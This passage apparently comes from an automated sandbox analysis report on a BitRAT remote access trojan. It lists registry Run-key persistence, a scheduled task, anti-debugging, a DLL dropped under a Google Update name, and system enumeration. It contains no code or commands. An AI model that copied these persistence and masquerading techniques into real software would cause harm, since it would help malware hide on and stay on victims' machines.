Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name渀" C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\GoogleUpdate.dll C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010007000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8c000000000000002000000e6070c004100720067006a00620065007800200033000a005600610067007200650061007200670020006e0070007000720066006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000000fcc48b78810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e6070c004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001700000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000ba56f3b58810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000500000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e6070900420061007200510065007600690072000a004100620067002000660076007400610072007100200076006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000d15c0588f2bdd80100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000081ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000082ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
